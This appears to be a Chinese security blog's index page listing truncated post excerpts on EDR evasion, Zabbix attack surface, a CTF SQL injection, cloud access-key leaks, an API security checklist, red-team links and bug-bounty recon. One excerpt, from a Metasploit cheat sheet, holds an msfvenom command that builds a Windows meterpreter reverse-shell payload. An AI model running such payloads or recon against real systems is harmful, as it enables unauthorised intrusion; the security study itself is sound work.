℡回眸抹去乄殘鎦、的繁星

摘要： 原文： https://tttang.com/archive/1573/ 后续： https://xz.aliyun.com/t/11448 A blueprint for evading industry leading endpoint protection in 2022（译文） s0urce 阅读全文

摘要： 原文链接: https://www.anquanke.com//post/id/250722 Zabbix攻击面挖掘与利用 阅读量 **34618** | 一、简介 Zabbix是一个支持实时监控数千台服务器、虚拟机和网络设备的企业级解决方案，客户覆盖许多大型企业。本议题介绍了Zabbix基础架构、 阅读全文

摘要： 方法1 先上配置文件 根据此内容还可以继续补充，反之亦可 (mozilla.com$|firefox.com$|firefoxchina.cn$|shodan.io$|mozilla.org$|firefox.com.cn$|mozilla.net$|microsoft.com$|bing.net$ 阅读全文

摘要： 题目 CVE-2022-32991 Web Based Quiz System SQL注入 该CMS的welcome.php中存在SQL注入攻击。 解题思路： 1.搜索题目给出cve编号信息 2.访问靶场环境： js中无提示信息，进行手工访问。注册登录，找到带eid参数的welcom.php请求的数 阅读全文

摘要： 前言 项目中各厂商越来越趋势于使用云存储，云管理。 漏洞介绍 AK/SK（Access Key ID/Secret Access Key）即访问密钥，包含访问密钥ID（AK）和秘密访问密钥（SK）两部分，公有云通过AK识别用户的身份，通过SK对请求数据进行签名验证，用于确保请求的机密性、完整性和请求 阅读全文

摘要： 开发安全的 API 所需要核对的清单 以下是当你在设计，测试以及发布你的 API 的时候所需要核对的重要安全措施。 身份认证 [ ] 不要使用 Basic Auth ，请使用标准的认证协议（如 JWT，OAuth）。 [ ] 不要重新实现 Authentication、token generatin 阅读全文

摘要： 「声明：本博客中涉及到的相关漏洞均为官方已经公开并修复的漏洞，涉及到的安全技术也仅用于企业安全建设和安全对抗研究。本文仅限业内技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。」 红队框架 攻击技战法 [list] 云上攻击技战法 https://hackingthe.cloud/ [d 阅读全文

摘要： 参数的猜想 1/ The scope of this program was *.███.com With a wildcard, basic recon is: Subdomain Enumeration + HTTP server probing: $ subfinder -d example[ 阅读全文

摘要： MSF命令大全详解 0x00 payload生成 windows&linux Windows： msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom 阅读全文

该文被密码保护。 阅读全文